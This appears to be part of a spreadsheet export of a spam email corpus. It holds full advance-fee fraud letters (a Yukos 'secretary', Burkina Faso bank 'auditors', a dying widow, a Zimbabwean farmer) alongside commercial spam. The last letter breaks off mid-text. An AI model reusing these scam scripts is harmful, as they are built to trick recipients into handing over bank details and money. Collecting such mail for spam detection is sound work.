    <t>\n\nMY FRIEND,\n\nMY NAME IS ALEXEI  I. BORIS,PERSONAL SECRETARY TO MR.BORIS  MIKHAIL\nKHODORKOVSKY,THE ARRESTED CHAIRMAN/CEO OF YUKOS OIL  AND BANK MENATEP SPB IN\nRUSSIA.\n\nI HAVE THE DOCUMENTS OF A LARGE AMOUNT OF FUNDS WHICH HE  HANDED OVER TO ME\nBEFORE HE WAS DETAINED AND NOW BEEN TRIED IN RUSSIA FOR FINANCING POLITICAL\nPARTIES(the Union of Right  Forces, led by Boris Nemtsov, and Yabloko, a\nliberal/social  democratic party led by Gregor Yavlinsky) OPPOSED TO THE\nGOVERNMENT OF MR.VLADMIR PUTIN,THE PRESIDENT\n\nTHERE HAS BEEN A BULK FREEZING OF RUSSIAN BANK ACCOUNTS LINKED TO THE YUKOS\nCOMPANY THAT IS WHY FOREIGN AID IS REQUIRED.\nPRESENTLY, THE RUSSIAN COURT HAS FROZEN THE ASSETS OF YUKOS  DUE TO AN UNPAID\nTAX CLAIM DURING 2000 AND THE COMPANY MAY BE  FORCED INTO BANKRUPTCY. THIS IS\nALL AN ATTEMPT BY THE RUSSIAN  GOVERNMENT TO BRING ABOUT THE TOTAL DESTRUCTION\nOF YUKOS AND ERODE THE PERSONAL WEALTH OF MR. KHODORKOVSKY. FEAR OF ARREST  HAS\nFORCED ALL THE FIRM'S TOP EXECUTIVES TO REMAIN OUTSIDE RUSSIA. MY BOSS HAS\nTHEREFORE INSTRUCTED ME IN CONFIDENCE TO LOOK FOR A REPUTABLE AND CAPABLE\nINDIVIDUAL WHO CAN ASSIST US RECEIVE  THE TOTAL AMOUNT OF FUNDS TO BE RE-\nPROFILLED IS TWO HUNDRED AND SIXTEEN MILLION DOLLARS (USD$216,000,000.00) AND\nYOU WILL BE PAID 0.8% FOR YOUR MANAGEMENT SERVICES.AS SOON AS  I RECEIVE YOUR\nACCEPTANCE,I WILL SEND YOU THE NECESSARY  DETAILS  PLEASE REPLY THROUGH MY\nPRIVATE EMAIL ADDRESS:  alexeivan22@katamail.com\n\nYOURS SINCERELY,\nALEXEI BORIS\nNB:YOU CAN READ MORE OF HIS ORDEAL FROM:\n\n[URL]http://newsfromrussia.com[/URL]\n[URL]http://www.interfax.ru[/URL]\n[URL]http://www.supportmbk.com[/URL]\n[URL]http://www.nationmaster.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>202</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: keven wei &lt;envoltbattery@163.com&gt;\nDate: Tue, 27 May 2003 16:04:35 +0800</t>
  </si>
  <si>
    <t>Tue, 27 May 2003 16:04:35 +0800</t>
  </si>
  <si>
    <t>keven wei &lt;envoltbattery@163.com&gt;</t>
  </si>
  <si>
    <t>battery</t>
  </si>
  <si>
    <t>Dear sir or madam\n    Please let me introduce our company (NINGBO ENVOLT BATTERY CO.,LTD) to you, I am sorry if this letter disturb you, and please tell me I will remove your email address from our email list. Our company is a pioneer of new style enterprise in specialist of Zinc-manganese batteries and Alkaline manganese batteries. Our products have been past test through Acts testing Labs(H.K.) Ltd, China light industry quality supervise testing center.\n    We are specialized in the batteries of R20P, R14P, R6P, R03P, 6F22, LR6, LR03 etc. The products are high power, high capacity and long life, which deeply welcomed by home and foreign customers. If you have some business about battery, we are appreciated your enquiry, we will supply good quality and competitive price. Many thanks.\n    Best regards.\n    Keven wei\n\nNINGBO ENVOLT BATTERY CO.,LTD\nTel:0086-574-62598358\nFax:0086-574-62598338\n[URL]http://www.envolt.com[/URL]\nemail: envoltbattery@163.com\n\n</t>
  </si>
  <si>
    <t>http://www.envolt.com</t>
  </si>
  <si>
    <t>2994</t>
  </si>
  <si>
    <t>To: nan\nFrom: usman sankara &lt;usmansankara300@hotmail.fr&gt;\nDate: Tue, 27 Mar 2007 11:41:17 +0000</t>
  </si>
  <si>
    <t>Tue, 27 Mar 2007 11:41:17 +0000</t>
  </si>
  <si>
    <t>usman sankara &lt;usmansankara300@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>Your kind attention needed.</t>
  </si>
  <si>
    <t>Hello Dear,\n\nThis mail might come to you as a surprise and the temptation to ignore it as \nunserious could come into your mind but please consider it a divine wish and \naccept it with a deep sense of humility.\n\nI am Mr. Usman Sankara, the manager in charge of Auditing  department of \nBank of Africa (B.O.A)Ouagadougou Burkina Faso in West Africa, with due \nrespect and Regard, I have decided to contact you on a business transaction \nthat will be very beneficial to both of us at the end of the transaction.\n\nDuring our investigation and auditing in this Bank, my department came \nacross a very huge sum of money belonging to one of our deceased customer \nwho died on July 30th 2002 of a ghastly motor accident and the fund has been \ndormant in his account with this bank without any claim of the fund in our \nCustody either from his family or relation before our discovery to this \ndevelopment. Although personally,\n\nI keep this information secret to enable the whole plans and idea be \nProfitable and successful during the time of execution, the said amount is \nFifteen million three hundred thousand United States dollars(US$15.3m), as \nit may interest you to know, I got your impressive information on my search \nfor a reliable partner, I contacted you to be my partner and person to be \nreliable and capable to champion a business of such magnitude without any \nproblem.\n\nMeanwhile all the arrangement to put claim over this fund as the next of kin \nto the deceased, get the required approval and transfer this money to a \nforeign account has been put in Place and directives and needed information \nwill be relayed to you as soon as you indicate your interest and willingness \nto assist me and also benefit your self to this great business opportunity, \nIn fact I could have done this deal alone but because of my position in this \ncountry as a civil servant and we are not allowed to operate a foreign \naccount and would eventually raise eye brow on my side during the time of \ntransfer because I work in this bank.\n\nThis is the actual reason why it will require a second party or fellow who \nwill forward claims as the next of kin with affidavit of trust of oath to \nthe bank and also present a foreign account where he will need the money to \nbe re-transferred into on his request as it may be after due verification \nand clarification by the correspondent branch of the bank where the whole \nmoney will be remitted from to your own designation bank account.\n\nI will not fail to inform you that this transaction is 100% risk free, on \nsmooth conclusion of this transaction, you will be entitled to 30% of the \ntotal sum as gratification, while 5% will be set aside to take care of \nexpenses that may arise during the time of transfer, while 65% will be for \nme, please you have been advised to keep "Top Secret" as I am still in \nservice and intend to retire from service after we conclude this deal with \nyou.\n\nI will be monitoring the whole situation here in this bank Until you confirm \nthe money in your account, and ask us to come down to your country for \nsubsequent sharing of the fund according to percentages previously indicated \nand further Investment, either in your country or any country you advice us \nto invest in and all other necessary vital information will be send to you \nwhen I hear from you.\n\nI suggest you get back to me As soon as possible and also include your \npersonal phone/mobile and fax numbers for easy communication.\n\nYours faithfully,\nMr. Usman Sankara\nThe manager in charge of\nAuditing department of\nBank of Africa (B.O.A)\nOuagadougou  Burkina Faso.\n\n_________________________________________________________________\nGagnez des crans plats avec Live.com [URL]http://www.image-addict.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>4214</t>
  </si>
  <si>
    <t>To: licensing@internet.com\nFrom: Radisson Chicago &lt;info@purplehotel.com&gt;\nDate: Tue, 27 Aug 2002 23:55:13 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 23:55:13 +0100</t>
  </si>
  <si>
    <t>Radisson Chicago &lt;info@purplehotel.com&gt;</t>
  </si>
  <si>
    <t>licensing@internet.com</t>
  </si>
  <si>
    <t>Chicago Meeting Site</t>
  </si>
  <si>
    <t>\n\n# THE CONVENIENCE OF\n\n## CHICAGO\n\n#### EASY ON YOUR BUDGET\n\n\n\nWhen planning your next Chicago meeting consider the\n\n\n\nRadisson Hotel Chicago-Northshore\n\n\n\n      Great location just 8 miles north of Downtown Chicago off I-94 Expressway\n\n      $85 State Government Rate with only 6% Sales Tax (Chicago 14.9%, Rosemont 12%)\n\n      OHare Shuttle Service Available\n\n      Free High Speed Internet Access\n\n      Free Ample Parking\n\n      State Certified Minority Business Enterprise (MBE) #363778006\n\n      18000+ Square Feet of Flexible Meeting Space\n\n      #3 Rated Hotel for Customer Service in Entire Radisson Chain Worldwide*\n\n      Great Restaurants, Shopping &amp; Activities\n\n      FEMA #IL-0458 and ADA Compliant\n\n\n\n##### Contact Riz Bhatti @ 1847-677-1234 ext. 6884 or\n\n###### Donald Bae @ 1847-677-1234 ext. 6880\n\nTake a virtual tour of our hotel @ [URL]www.radisson-chicago.com[/URL]\n\n\n\n\n\nDecember 2001 Customer Satisfaction Survey-Radisson Worldwide Hotels and\nResorts\n\n</t>
  </si>
  <si>
    <t>www.radisson-chicago.com</t>
  </si>
  <si>
    <t>4216</t>
  </si>
  <si>
    <t>To: licensing@internet.com\nFrom: Donald Bae &lt;donaldbae@purplehotel.com&gt;\nDate: Tue, 27 Aug 2002 22:06:34 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 22:06:34 +0100</t>
  </si>
  <si>
    <t>Donald Bae &lt;donaldbae@purplehotel.com&gt;</t>
  </si>
  <si>
    <t>_x0011_q_x0008__x001A_ Worldwide*\nGreat Restaurants, Shopping &amp; Activities\nFEMA #IL-0458 and ADA Compliant\n\nContact Riz Bhatti @ 1847-677-1234 ext. 6884 or\nDonald Bae @ 1847-677-1234 ext. 6880\nTake a virtual tour of our hotel @ _x0013_ HYPERLINK "[URL]http://www.radisson-chicago.com[/URL]" _x0001__x0014_[URL]www.radisson-chicago.com[/URL]_x0015_\n\n\nDecember 2001 Customer Satisfaction Survey-Radisson Worldwide Hotels and Resorts\n_x0013_ EMBED MS_ClipArt_Gallery.5  _x0014__x0001__x0015_</t>
  </si>
  <si>
    <t>http://www.radisson-chicago.com www.radisson-chicago.com</t>
  </si>
  <si>
    <t>4217</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - National Travelers" &lt;nt@insiq.us&gt;\nDate: Tue, 27 Aug 2002 19:04:28 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 19:04:28 -0400</t>
  </si>
  <si>
    <t>"IQ - National Travelers" &lt;nt@insiq.us&gt;</t>
  </si>
  <si>
    <t>The Best Critical Illness Policy on the Market</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  The best critical illness product on the market. Period.  National Travelers Life Insurance Company    Immediate Payment Upon Diagnosis!  15 valuable lifetime benefits 100% of the Face Amount	  Heart Attack	 Stroke	 Invasive Cancer	 HIV (for Medical Personnel)	  Paralysis	 Organ Transplant	 Severe Burns	 Loss of Independent Living	  Terminal Illness	 Kidney Failure	 Blindness	 Death By Any Cause	   	 25% of the Face Amount	  Coronary Artery Bypass	 Non-invasive Cancer	   	 10% of the Face Amount	  Coronary Angioplasty	    Worksite Marketing	 Individual Sales	   	 	 ? Guaranteed Issue for Groups of 25+	 ? Up to $1,000,000 maximum ? Electronic Enrollment	 ? Simplified Issue up to $100,000	  ? Unlimited billing options	 ? Up to 75% advance	      Don't forget to ask about our matching retirement plan!	 To learn more, please call us today!  800-626-7980 ? or ? 	 Please fill out the form below for more information	  Name:	 	  Address:	 	  City:	 	 State:	 	 Zip:	 	  E-mail:	 	  Phone:	 	  Area of Interest:	  Worksite        Individual Sales 	 Both 	  	  Personal Producer      Manager 	 Number of Agents 	  	  	  	    	    National Traveler's Life Co.	 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insuranceiq.com[/URL]   Legal Notice    ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The Best Critical Illness Policy on the Market =20      =20            =20             =20             =20              =20                 100% of the Face = Amount =20                 Heart = Attack Stroke Invasive = Cancer HIV (for Medical = Personnel) =20                 Paralysis Organ Transplant Severe Burns Loss of Independent = Living =20                 Terminal Illness Kidney Failure Blindness Death By Any = Cause =20                  =20                 25% of the Face = Amount =20                 Coronary Artery = Bypass Non-invasive = Cancer =20                  =20                 10% of the Face Amount =20                 Coronary = Angioplasty               =20                 Worksite Marketing Individual Sales =20                  =20                 • Guaranteed Issue for Groups of = 25+ • Up to $1,000,000 = maximum =20                 • Electronic = Enrollment • Simplified Issue up to = $100,000 =20                 • Unlimited billing = options • Up to 75% advance               =20            =20                        To learn more, please call us today!             — or — =20           =20              =20                    =20                         Please fill out the form below for more = information =20                         Name:   =20                         Address:   =20                         City:   State:   Zip:   =20                         E-mail: =20                         Phone: =20                         Area of Interest:  =20                                                      Worksite      =20                                                      Individual Sales    =20                            Both =20                          =20                            =20                                                      Personal Producer    =20                                                      Manager    =20                            Number of Agents = =20                          =20                           =20                           =20                           =20                           =20                           =20                          =20            =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insuranceiq.com[/URL] Legal Notice=20 ------=_NextPart_000_428CD_01C24DE6.6DD2E5F0--</t>
  </si>
  <si>
    <t>4206</t>
  </si>
  <si>
    <t>To: &lt;customerapparelu@webnote.net&gt;\nFrom: eyeey@keromail.com\nDate: Tue, 27 Aug 2002 13:41:46 -1600</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 13:41:46 -1600</t>
  </si>
  <si>
    <t>eyeey@keromail.com</t>
  </si>
  <si>
    <t>&lt;customerapparelu@webnote.net&gt;</t>
  </si>
  <si>
    <t>Memory loss?</t>
  </si>
  <si>
    <t>This is a multipart message in MIME format. --9EE6957817154900AA7494F2E1F329BE Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable w3498 98sd0f89 498w90 Lose weight while building lean muscle mass  and reversing the ravages of aging all at once Human         Growth Hormone Therapy Lose weight while         building lean muscle mass          and reversing the ravages of aging all at once.         Remarkable discoveries about Human Growth Hormones (HGH)          are changing the way we think about aging and weight loss.&lt;= /p&gt;            • Lose Weight                 • Build Muscle Tone                 • Reverse Aging                 • Increased Libido                 • Duration Of Penile                   Erection • Healthier Bones                 • Improved Memory                 • Improved skin                 • New Hair Growth                 • Wrinkle                   Disappearance                  Visit           Our Web Site and Learn The Facts: Click Here  vvnx11 We are strongly against sending unsolicited emails to those who do not wis= h to receive our special mailings. You have opted in to one or more of our=  affiliate sites requesting to be notified of any special offers. We have = retained the services of an independent 3rd party to manage list managemen= t and removal services. If you do not wish to receive further mailings, pl= ease click below to be removed from the list. Please accept our apologies = if you have been sent this email in error. We honor all removal requests. To unsubscribe click here av8r5  98984w 0sd9f89085 --9EE6957817154900AA7494F2E1F329BE Content-Type: text/plain Content-Disposition: inline ______________________________________________________________________ This messsage was sent using the trial version of the  1st Class Mail Server software.  You can try it for free at [URL]http://www.1cis.com[/URL] Is this unsolicited email?  Instructions for reporting unsolicited email can be found at at [URL]http://www.1cis.com[/URL] --9EE6957817154900AA7494F2E1F329BE--</t>
  </si>
  <si>
    <t>http://www.1cis.com http://www.1cis.com</t>
  </si>
  <si>
    <t>4192</t>
  </si>
  <si>
    <t>To: &lt;zzzz4@spamassassin.taint.org&gt;\nFrom: vbj101521@caramail.com\nDate: Tue, 27 Aug 2002 02:33:57 +0100</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 02:33:57 +0100</t>
  </si>
  <si>
    <t>vbj101521@caramail.com</t>
  </si>
  <si>
    <t>&lt;zzzz4@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>- Custom Websites for $399 Complete! (1709D@5)</t>
  </si>
  <si>
    <t>\n\n**Beautiful, 100% Custom Websites, $399 Complete!**  \n  \n---  \n  \n|\n\n|  |\n\n![]([URL]http://7x24.sunshinehui.com[/URL]\n\n|\n\n**Get a beautiful, 100% Custom Web Site ( _or yours redesigned_ )  _for only\n$389_!*  \n  \nWe have references coast to coast  \nand will give you _plenty of sites to view!_**  \n  \n---|---  \n  \n**Includes up to 7 pages (you can add more), java rollover buttons, feedback\nforms, more. It will be constructed to your taste and specifications. We do\nnot use templates,   _our sites are completely custom.  _   * _Must host with\nus @ $19.95/mo (100 Megs, 20 Email accounts, Control Panel, Front Page,\nGraphical Statistics, more).  \n_**  \n  **_For sites to view, complete below or call our message center at\n    321-726-2209 (24 hours). Your call will be returned promptly._  \n  \n** ** _NOTE:    If you are using a web based email program (such as Yahoo,\nHotmail, etc.) the form below will not work._  Instead of using the form,\n_CLICK HERE_ .**\n\n    Name: Phone w/AC*:State:   \nType Project: ___New Site: Redesign Flash Intro/banner_   Current site?:  \nComments:  \n  \n  \n  \nIf you do not wish to receive our messages, **_CLICK HERE   (Please enter ALL\nemail addresses (in the body of the message) you wish to have eliminated from\nfuture mailings.\n\n_**  \n  \n[3121jDvN9-@9]\n\n</t>
  </si>
  <si>
    <t>4196</t>
  </si>
  <si>
    <t>To: &lt;kalyani@ftech.net&gt;, &lt;leander@meta3.net&gt;,\nFrom: tammy490t@yahoo.com\nDate: Tue, 27 Aug 2002 00:35:05 -1600</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 00:35:05 -1600</t>
  </si>
  <si>
    <t>tammy490t@yahoo.com</t>
  </si>
  <si>
    <t>&lt;kalyani@ftech.net&gt;, &lt;leander@meta3.net&gt;,</t>
  </si>
  <si>
    <t>Free Merchant Account Information                XAXFT</t>
  </si>
  <si>
    <t>Request A Free No Obligation Consultation!\nAccept Credit Cards Today!\nNo Set Up Fees\nNo Application Fees\nAll Credit Types Accepted\nRetail Rates as Low as 1.60%\nMail Order Rates As Low as 2.30%\nSet Up Your Merchant Account within 48 Hours\nNO CANCELLATION FEES\nNo Money Down\nNo Reprogramming Fees\nWe Will Beat Anybodys Deal By 15%\n\nWe make it easy and affordable to start accepting Credit Cards today.\n99% of our applicants are approved!\n\n[URL]http://64.251.23.141[/URL]\n\nto be removed : [URL]http://64.251.23.141[/URL]</t>
  </si>
  <si>
    <t>http://64.251.23.141 http://64.251.23.141</t>
  </si>
  <si>
    <t>2546</t>
  </si>
  <si>
    <t>To: nan\nFrom: MRS SUSSAN ADAMS &lt;sunyynz@internet.com.uy&gt;\nDate: Tue, 26 Sep 2006 23:52:46 -0300</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2006 23:52:46 -0300</t>
  </si>
  <si>
    <t>MRS SUSSAN ADAMS &lt;sunyynz@internet.com.uy&gt;</t>
  </si>
  <si>
    <t>DEAR BELOVED,</t>
  </si>
  <si>
    <t>\nDEAR BELOVED,\n\nI am Sussan Adams\n\nPLEASE ENDEAVOUR TO USE IT FOR THE CHILDREN OF GOD. I am the above named\nperson. I am married to Dr. Donald Adams A LIBERIAN but I?m now in Nigerian\nGeneral HOSPITAL taking treatment for my sickness, who worked with U.S embassy\nin LIBERIAN for nine years before he died in the year 2000. We were  \nmarried for\neleven years without a child. He died after a brief illness that lasted for\nonly four days. Before his death we were both born again Christians. Since his\ndeath I decided not to re-marry or get a child outside my matrimonial home\nwhich the Bible is against.\n\nWhen my late husband was alive he deposited the sum of$10.5 Million (Ten\nMillion five hundred thousand U.S.Dollars) with A Bank Presently, this  \nmoney is\nstill under the safe keeping of the Reserve FINANCE COMPANY Recently,  \nmy Doctor\ntold me that I would not last for the next SEVEN months due to my cancer\nproblems.\n\nThough what disturbs me most is my stroke.Having known my condition, I decided\nto donate this fund to church or better still a Christian or muslim individual\nThat will utilize this money the way I am going to instruct here in. I want a\nchurch that will use this fund on, orphanages, deaf and domb and poor widows\npropagating the word of God and to ensure that the house of God is maintained.\nThe Bible made us to understand that blessed is the hand that giveth. I took\nthis decision because I don't have any child that will inherit this money and\nmy husband relatives are not Christians and I don't want my husband's hard\nearned money to be misused by unbelievers. I don't want a situation where this\nmoney will be used in an ungodly manner. Hence the reason for taking this bold\ndecision.\n\nI am not afraid of death hence I know where I am going. I know that I am going\nto be in the bosom of the Lord. Exodus 14 VS 14 says that the lord will fight\nmy case and I shall hold my peace. I don't need any telephone communication in\nthis regard because of my health because of the presence of my husband's\nrelatives around me always. I don't want them to know about this development.\nWith God all things are possible. As soon as I receive your reply I forward\nyour personal information, such as Your full name, Your full address,  \nwith Your\ntelephone and fax number to my lawyer so that he will contact you as the legal\nowner of my fund before the bank will be transferring the fund into your\nnominated Bank Account in your country.\n\nI will also issue you a letter of a authority that will back you up as  \nthe real\nnext of kin and the original- beneficiary of my fund. I want you and  \nthe church\nto always pray for me because the lord is my shepherd,you will also promise me\nthat you will not seat on the fund when it gets into your bank account. My\nhappiness is that I lived a life of a worthy Christian. Whoever that wants to\nserve the Lord must serve him in spirit and truth. Please always be prayerful\nall through your life, any delay in your reply will give me room in serching\nfor a church or Christian individual for this same purpose. Please assure me\nthat you will act accordingly as I stated herein. Hoping to hear from you as\nsoon as possible.\n\nRemain blessed in the name of the Lord.\n\nYours in Christ,\n\nMrs. Sussan Adams\n\n\n\n\n\n\n\n\n     Conectese mas rapido y ahorre hasta un 50%\n    Tel. 0909.2030 =&gt;  $0,15 IVA incluido el minuto\n______________________________________________________\n[URL]http://www.internet.com.uy[/URL] - En Uruguay somos internet\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.internet.com.uy</t>
  </si>
  <si>
    <t>URY</t>
  </si>
  <si>
    <t>2542</t>
  </si>
  <si>
    <t>To: nan\nFrom: mu ga &lt;mu_ga47@hotmail.com&gt;\nDate: Tue, 26 Sep 2006 14:36:06 +0000</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2006 14:36:06 +0000</t>
  </si>
  <si>
    <t>mu ga &lt;mu_ga47@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MUSA GARUBA</t>
  </si>
  <si>
    <t>FROM THE DESK OF : MUSA GARUBA,\nAUDITING AND ACCOUNTING SECTION,\nAFRICAN DEVLOPMENT BANK ( A.D.B )\nOUAGADOUGOU BURKINA-FASO,WEST AFRICA.\n\nAttention Please,\n\nI am Musa Garuba, the Director in charge of Auditing and Accounting section \nof AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou Burkina-faso West Africa. \nWith due respect and regard. I have decided to contact you on a business \ntransaction that will be very beneficial to both of us at the end of the \ntransaction .\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The said amount was U.S$ 22.85M ( Twenty two million, eighty five thousand \nUnited States Dollars). As it may interest you to know, I got your \nimpressive information through internet directory . Meanwhile all the whole \narrangement to put claim over this fund as the bonafide next of kin to the \ndeceased, get the required approval and transfer this money to a foreign \naccount has been put in place and directives and needed information will be \nrelayed to you as soon as you indicate your interest and willingness to \nassist, and also benefit your self to this great business opportunity.\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60% will be for me and my coleagues. Please, you have \nbeen adviced to keep "Top Secret" as I am still in service and intend to \nretire from service after we conclude this deal with you.\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I look forward to receive your phone and fax numbers for easy communication,\n\nYours faithfully,\n\nMusa Garuba.\n\n_________________________________________________________________\nDon't just search. Find. Check out the new MSN Search! \n[URL]http://search.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>3160</t>
  </si>
  <si>
    <t>To: nan\nFrom: emekaben@aol.co.uk\nDate: Tue, 26 Jun 2007 09:32:32 -0400</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2007 09:32:32 -0400</t>
  </si>
  <si>
    <t>emekaben@aol.co.uk</t>
  </si>
  <si>
    <t>\nMy Dear ,\n\nSorry to hear this news and understand that the fault is not from me.\nI'm happy to inform you about my success in getting those funds transferred under the cooperation of a new partner from South Korea.\n\nPresently ,I'm in South Korea for investment projects with my own share of the total sum. Meanwhile,i didn't forget your past efforts and attempts to assist me in transferring those funds despite that it failed us some how. \n\nNow contact my secretary in Benin his name is Mr Ignatuis Michael on his-email address below.\nig_mich2010@yahoo.fr\n\nAsk him to send you the total of $700.000.00 which i kept for your compensation for all the past efforts and attempts to assist me in this matter. \n\nI appreciated your efforts at that time very much. So feel free and get in touch with my secretary Mr Ignatuis and instruct him where to send the amount to you.\n\nPlease do let me know immediately you receive it so that we can share joy after all the suffering at that time.\n\nAt the moment, I’m very busy here because of the investment projects which i and the new partner are having at hand, finally, remember that I had forwarded instruction to the secretary on your behalf to receive that money, So feel free to get in touch with Mr Ignatuis Michael,He will send the amount to you without any delay ok. \n\n\nRegards, \nEmeka Benjamin\n  \n\n\n\n________________________________________________________________________\nGet a FREE AOL Email account with 2GB of storage.  Plus, share and store photos and experience exclusively recorded live music Sessions from your favourite artists. Find out more at [URL]http://info.aol.co.uk[/URL]\n</t>
  </si>
  <si>
    <t>http://info.aol.co.uk</t>
  </si>
  <si>
    <t>3159</t>
  </si>
  <si>
    <t>To: nan\nFrom: asinthe nignan &lt;asinthe_nignan33@hotmail.fr&gt;\nDate: Tue, 26 Jun 2007 04:29:31 +0000</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2007 04:29:31 +0000</t>
  </si>
  <si>
    <t>asinthe nignan &lt;asinthe_nignan33@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>\nFROM THE DESK OF DR ASINTHE NIGNAN.  BILL AND EXCHANGE MANAGER BANK OF AFRICAN . OUAGADOUGOU, BURKINA FASO. WEST AFRICA Dear  , how are you,first i will explain my self in brief for you before we proceed.I am the manager of bill and exchange at the foreign remittance department of BANK OF AFRICAN (BOA)  I am writing to Seek your interest over a business , In my department we discovered an abandoned sum of $15.5m US dollars (fifteen million five US dollars). In an account that belongs to one of our foreign customer who died along with his entire family in November 15th 2001 in a plane crash at abidjan cote'voire. Since we  got information about his death, we have been expecting his next of kin to come over and claim his money because we cannot release it unless his next of kin or relative applies for it as next of kin or relation to the deceased as indicated in our banking guidelines but unfortunately we learnt that all his supposed next of kin or relation died along side with him at the plane crash leaving nobody behind for the claim. It is therefore upon this discovery that I and two other officials in my department now  decided to excape with the fund,and as such we vial to make this business proposal to you so that my bank will release the fund into your account as the next of kin to our bank deceased customer for safety and subsequent disbursement since nobody is coming for claims and we don't want this money to go into the bank treasury. Infact i know the fund will not even go into the bank treasury,but our top bank officials(directors)will only share it among themselves into their accounts. The Banking law and guideline here in burkina faso stipulates that if any customer account or property remains unserviceable or dormant,and unclaimed after five years, the account will be confiscated and transfered into the Bank treasury as unclaimed bill. The request of  foreigner as next of kin in this business is occasioned by the fact that the customer was a foreigner and a Burkinabe cannot stand as next of kin to a foreigner. We agree that 30% of this money will be for you as foreign partner,inrespect to the provision of a foreign account,and your imense contribution to champion the course of transfering the fund to your  account.  10 % will be set aside forexpenses incurred by the both party during the business and 60 % would be for me and my colleagues. There after I and my colleagues will visit your country for disbursement according to the percentages indicated. Therefore to enable my bank transfer the fund into your account,i will send to you the text of application which you will send to my bank as next of kin to the deceased customer and that will be when you indicate your interest in the business, you must apply first to the bank as relations or next of kin of our bank deceased indicating your bank name, your bank account number, your private telephone and fax number for easy and effective communication and location where in the money will be remitted . Upon receipt of your reply, I will send to you by fax or email the text of the application. I will not fail to bring to your notice that this transaction  is risk-free and that you should not entertain any atom of fear as all required informations will be perfectly made for you to champion the course of the transaction with my bank without any hitch or risk . You should contact me immediately as soon as you receive this letter. Trusting to hear from you immediately. Your’s sincerely, DR ASINTHE NIGNAN. BILL AND EXCHANGE MANAGER(BOA\n_________________________________________________________________\nExpress yourself instantly with MSN Messenger! Download today it's FREE!\n[URL]http://messenger.msn.click-url.com[/URL]</t>
  </si>
  <si>
    <t>4583</t>
  </si>
  <si>
    <t>To: &lt;Undisclosed.Recipients@qxl-gw.man.poznan.pl&gt;\nFrom: wjl74@usa.net\nDate: Tue, 26 Jun 2001 00:01:22 -0700</t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 00:01:22 -0700</t>
  </si>
  <si>
    <t>wjl74@usa.net</t>
  </si>
  <si>
    <t>&lt;Undisclosed.Recipients@qxl-gw.man.poznan.pl&gt;</t>
  </si>
  <si>
    <t>The Hottest Business In America is Open..Everyone Welcome</t>
  </si>
  <si>
    <t>There Are Only A Few Things Needed to Be Successful:\n\nYou need a multi-billion dollar, ground floor opportunity with the most \nsought after product in an untapped market that has people clearing $60,000 \ntheir first month and $20,000 per week after 8 weeks. You need full support \nfrom the start so your growth potential is unlimited.\n\n\nClick here for your FREE special report.\n\n[URL]http://www.18w6j3g4wrr5s.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nTo Be Remove From Further Mailings reply to [URL]http://www.18w6j3g4wrr5s.com[/URL] with remove in the subject line..</t>
  </si>
  <si>
    <t>http://www.18w6j3g4wrr5s.com http://www.18w6j3g4wrr5s.com</t>
  </si>
  <si>
    <t>1419</t>
  </si>
  <si>
    <t>To: R@M\nFrom: hassan goerge &lt;hassanger21@hotmail.com&gt;\nDate: Tue, 26 Jul 2005 19:03:17 +0400</t>
  </si>
  <si>
    <t>Tue, 26 Jul 2005 19:03:17 +0400</t>
  </si>
  <si>
    <t>hassan goerge &lt;hassanger21@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">VERY IMPORTANT </t>
  </si>
  <si>
    <t xml:space="preserve">\n\nDear Friend ,\n\n\nNaturally, this letter will come to you as a surprise since we have not met,permit me however, I am MR.HASSAN  GEORGE,a Zimbabwean Farmer. I am contacting you as the need for me to have a foreign partner in your country has become necessary due to my plans to relocate and establish a private company in that region, as the present political instability in my country (Zimbabwe), does not encourage financial investment as the environment is not conducive for investment and most of all security is not guaranteed,just as reported by the International media.\n\nI wouldn't go much deep detailing but you can have a look on this web-site if you have the time and see what kind of brutal president we have.\n\n[URL]http://www.rte.ie[/URL]\n\nhtml This problem started when the Zimbabwean government under the leadership of President Robert Mugabe announced a decree on May 31st 2001 to seize more than 6000 white-owned farms. So far, more than 5,400 white owned farms have been invaded, properties confiscated and farm lands seized. During these periods, as reported by the international media and C.N.N, more than 500 white farmers were killed, the government didn't stop at this, as just recently the government have asked all white-farmers to give up their farms to black farmers or risk going to prison.\n\nHaving lived in this country (Zimbabwe) for more than 35 years, I have no other country to go to, nor can I trace any of my distant relatives. Therefore, I decided to contact you for your assistance so that I can establish a company in your country and relocate there. Also, I must re-iterate the importance of having a citizen of your country to front as the owner of the enterprise, due to the fact that I will be a foreigner in your country.\n\nI 